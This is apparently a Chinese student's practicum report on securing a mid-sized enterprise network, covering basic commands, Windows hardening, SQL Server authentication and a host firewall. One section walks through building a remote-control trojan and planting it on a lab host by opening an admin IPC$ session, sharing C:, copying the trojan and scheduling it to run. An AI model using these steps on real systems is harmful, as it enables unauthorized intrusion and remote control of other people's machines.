1、XX中型企业网安全网络信息安全报告一、 实验目的及要求该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。二、 专周内容1、 安全需求分析(1)
2、网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:A、 公开服务器的安全保护B、 防止黑客从外部攻击C、 入侵检测与监控D、 病毒防护E、 数据安全保护F、 网络的安全管理(2)解决网络安全问题的一些要求 A、大幅度地提高系统的安全性(重点是可用性和可控性); B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置; C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作; D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展; E、安全保密系统具有较
3、好的性能价格比。一次性投资,可以长期使用; F、安全产品具有合法性,及经过国家有关管理部门的认可或认证; (3)系统安全目标 A、建立一套完整可行的网络安全与网络管理策略; B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信; C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度; E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;2、 网络拓扑3、 网络安全的基本内容(1) 基本网络命令
4、A、ping命令:ping t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:C、pathping 除了显示路由外,还提供325S的分析,计算丢失包的%(2) 操作系统安全A、屏蔽不需要的服务组件 开始程序管理工具服务 出现以下窗口: 然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”“程序”“管理工具”“服
5、务”“Server”(3) 数据库系统安全 A、使用安全的帐号策略和Windows认证模式由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Se
6、rver的连接要求Windows身份验证模式。Windows认证模式比混合模式更优越,原因在以下:1) 它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。2) 服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间 。3) 使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。4) Windows认证意味着你只需要将密码存放在一个地方。要在SQL Server的Enterprise Manager安装W
7、indows身份验证模式,步骤操作: 展开服务器组右键点击服务器然后点击“属性”在安全性选项卡的身份验证中点击“仅限Windows”。(4) 网络防火墙工具:红墙主机网络防火墙安装1. 具体操作如下: 第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;第二步: 在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮; 第三步: 在“软件许可协议”对话框,接受协议点击“是”;第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;第五步: 单击“下一步”按钮,出现“选
8、择目标位置”对话框;第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;第八步: 单击“下一步”按钮,系统开始复制文件;第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:网络监控中心: (5) 网络攻击工具:“广外女生”
9、它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。主要步骤:首先运行“gwg.exe”,出现如图窗口:选中“服务端设置”,生成“GDUFS.exe”木马:然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“G
10、DUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38具体步骤及命令:“开始”“运行”“cmd”命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系命令:net time 191.168.12.38 获取目标主机的时间命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:命令:191.168.12.38 1
11、0:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。 三、 专周小结: 通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:1, 及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。2, 定期检查维护各网络设备的运行情况并进行维护。3, 不定期对服务器进行更新和检查。4, 遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。 感谢老师对我们的教导。